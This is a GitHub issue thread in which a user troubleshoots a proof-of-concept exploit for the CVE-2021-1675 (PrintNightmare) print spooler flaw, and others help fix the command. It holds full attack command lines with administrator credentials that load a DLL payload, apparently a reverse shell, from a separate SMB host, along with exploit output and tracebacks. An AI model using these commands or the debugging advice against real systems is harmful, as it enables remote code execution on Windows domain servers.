Trouble running exploit
mrh3r000 opened this issue · 13 comments
what problem did i have as described below when i ran the exploit.
_```
uring handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/tmp/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
ans = self.recvSMB(packetID)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out._
Hope to get help from seniors. Thank you. <3 <3 <3
can you show your command @mrh3r000
This is my command.
──(root💀kali)-[/tmp]
└─# python3 CVE-2021-1675.py se1300340/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155\smb\shell-cmd.dll'
what is se1300340 ? is it dc name or netbios name? on which windows you are trying this ?
se1300340 is the domain name of the server. I execute in tmp windows.
so its dc ? which windows 19 ? and which samba server you use to host dll payload ? is it smb3 ?
i use smb3 to save payload. I don't understand where "/impacket$ ./CVE-2021-1675.py domain.local/dummy:Testing12345@10.1.1.1 '\10.1.1.10\smb\shell-cmd.dll' " (this is the manual file from another source).This step i perform mining in windows tmp or impacket ?
#19 follow this
you have to use impacket.
Thank you senior. I will try again. ^_^ @rahultalekar
Hey bro, @rahultalekar .
I have a new problem. Please help me. T_T
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155>\smb\rev.dll'
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
@mrh3r000 your command is wrong remove > from \192.168.40.155> and then run again
try this:
python3 CVE-2021-1675.py se1300340/Administrator:'Admin@123'@192.168.40.195 '\192.168.40.155\smb\shell-cmd.dll
@rahultalekar
So that's the fault. Don't know if there is a py file error?
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:'Admin@123'@192.168.40.195 '\\192.168.40.155\smb\rev.dll' 1 ⨯
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
ans = self.recvSMB(packetID)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
If u still can't run it try a password without '@'. He is filtering out '@' in the PoC code, at least I think so.